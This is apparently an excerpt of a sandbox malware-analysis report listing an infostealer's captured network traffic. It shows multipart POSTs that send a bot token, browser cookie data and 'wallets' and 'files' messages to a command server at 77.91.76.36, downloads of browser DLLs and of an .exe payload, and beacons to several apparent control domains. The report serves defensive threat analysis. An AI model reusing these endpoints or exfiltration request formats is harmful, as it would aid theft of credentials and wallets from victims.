------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECHost: 77.91.76.36Content-Length: 355Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 2d 2d 0d 0a Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file"------KEGDAKEHJDHIDHJJDAEC--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 77.91.76.36Content-Length: 355Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file"------CBGCAFIIECBFIDHIJKFB--
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/nss3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 77.91.76.36Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 77.91.76.36Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"wallets------KEHJKJDGCGDAKFHIDBGC--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFHost: 77.91.76.36Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="message"files------GHJKECAAAFHJECAAAEBF--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKECHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCAAKJDHJJJJJKKKFBHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKEHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKECHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFCHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKEHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDAHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 77.91.76.36Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFCHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBAHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 77.91.76.36Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHHost: 77.91.76.36Content-Length: 118379Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 77.91.76.36Content-Length: 264Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 64 6f 6e 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="message"done------ECGHJJEHDHCAAKFIIDGI--

Source: Joe Sandbox View

IP Address: 77.91.76.36 77.91.76.36

Source: Joe Sandbox View

ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: iplogger.com

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chincenterblandwka.pw
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rmxsdoiubcthmnpt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: sumagulituyo.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jifpetpxunlhnkjb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: snukerukeutit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://llolrcsecsfuqj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: lightseinsteniki.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xuodqppsfrrhudh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: liuliuoumumy.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rlfrvmkisufwom.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rkcmcblyxglr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xaqntkatthh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vfqbofxnlmres.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bqyhkwmkvqq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cggsoyaypey.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yedwqingjwrxr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frwcyyflmifrrs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mqprrejcqtwyyvrf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gfxsapvvixyxnjeg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mrhawlivvqmew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jlxpegwxlks.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b42239df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 5.42.65.125
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://reuyvyhuqyymkw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://txabenbdofjrq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
